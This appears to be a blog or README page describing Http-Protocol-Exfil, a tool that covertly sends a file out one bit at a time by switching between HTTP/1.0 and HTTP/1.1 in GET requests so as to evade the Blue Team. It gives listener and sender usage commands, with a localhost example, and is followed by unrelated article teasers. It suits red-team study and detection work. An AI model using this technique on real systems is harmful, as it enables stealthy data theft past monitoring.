Http-Protocol-Exfil uses HTTP protocol version to send a file bit by bit (“HTTP/1.0” is a 0 and “HTTP/1.1” is a 1). It uses GET requests so the Blue Team would only see the requests to your IP address. However, it takes a long time to send bigger files, for example it needs 1 hour to send 200 KB, and the amount of requests would be very high (8 times the number of bytes of the file).
Create Listener
To run the listener use listener.py with one optional argument: the port it will be listening in.
python3 listener.py [PORT]
Example:
python3 listener.py 8080
Send a file
To send a file use sender.py with two mandatory arguments: the file path and the url of the listener; and one optional argument: the name of the file created remotely (if not used, the name of the input file is used).
python3 sender.py -u URL -i INPUTFILE [-o OUTPUTFILE]
Example:
python3 sender.py -u “http://127.0.0.1:8080” -i test.txt -o updated_test.txt
Example
First the file is sent:
If the variable debug is set to True (it is by default) you can see the binary values in the listener log messages:
The new file is created with the content of the input file:
Imagine if you had a super-powered assistant who could automatically handle all the boring, repetitive…
Managing files efficiently is a core skill for anyone working in Linux, whether you're a…
Open ports act as communication endpoints between your Linux system and the outside world. Every…
Introduction In today’s cyber threat landscape, protecting endpoints such as computers, smartphones, and tablets from…
Introduction In today's fast-paced cybersecurity landscape, incident response is critical to protecting businesses from cyberattacks.…
Artificial Intelligence (AI) is changing how industries operate, automating processes, and driving new innovations. However,…